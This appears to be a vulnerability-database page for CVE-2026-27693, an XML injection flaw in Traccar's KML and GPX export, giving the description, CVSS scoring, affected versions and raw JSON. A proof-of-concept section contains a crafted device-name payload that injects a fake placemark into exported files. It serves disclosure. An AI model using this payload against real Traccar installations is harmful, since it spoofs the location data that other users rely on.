Security Vulnerability Report
中文
CVE-2026-27693 CVSS 5.4 MEDIUM

CVE-2026-27693

Published: 2026-05-05 13:16:28
Last Modified: 2026-05-08 20:04:19
Source: [email protected]

Description

Traccar is an open source GPS tracking system. In org.traccar:traccar versions starting at 6.11.1 before 6.13.0, the KML and GPX export functionality writes device names to XML output without proper escaping. An attacker with low privileges can create a device with a crafted name that injects XML content into exported files. If another user exports and opens the affected KML or GPX file, this can corrupt the file structure and spoof exported location data. This issue is fixed in version 6.13.0.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:traccar:traccar:*:*:*:*:*:*:*:* - VULNERABLE
Traccar 6.11.1
Traccar 6.12.x

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept: XML Injection via Device Name # 1. Attacker creates a device with a malicious name containing XML tags. # 2. Payload example to spoof location in KML: malicious_name = "RealDevice</name><Placemark><name>Spoofed Location</name><Point><coordinates>-122.0822035425683,37.42228990140251,0</coordinates></Point><Placemark><name>" # 3. When an admin exports the map (KML/GPX), the output XML will be corrupted: # <Document> # <name>RealDevice</name> # <Placemark>... (Injected content) ... # <name>RealDevice</name> <-- This might break the structure or render the fake point. # </Document>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-27693", "sourceIdentifier": "[email protected]", "published": "2026-05-05T13:16:28.367", "lastModified": "2026-05-08T20:04:19.057", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Traccar is an open source GPS tracking system. In org.traccar:traccar versions starting at 6.11.1 before 6.13.0, the KML and GPX export functionality writes device names to XML output without proper escaping. An attacker with low privileges can create a device with a crafted name that injects XML content into exported files. If another user exports and opens the affected KML or GPX file, this can corrupt the file structure and spoof exported location data. This issue is fixed in version 6.13.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-91"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:traccar:traccar:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.11.1", "versionEndExcluding": "6.13.0", "matchCriteriaId": "A453268E-69E6-4CE2-A341-8890520DF28E"}]}]}], "references": [{"url": "https://github.com/traccar/traccar/blob/v6.11.0/src/main/java/org/traccar/reports/GpxExportProvider.java#L52-L54", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/traccar/traccar/security/advisories/GHSA-32pj-vrqc-x656", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory", "Mitigation"]}, {"url": "https://github.com/traccar/traccar/security/advisories/GHSA-32pj-vrqc-x656", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory", "Mitigation"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.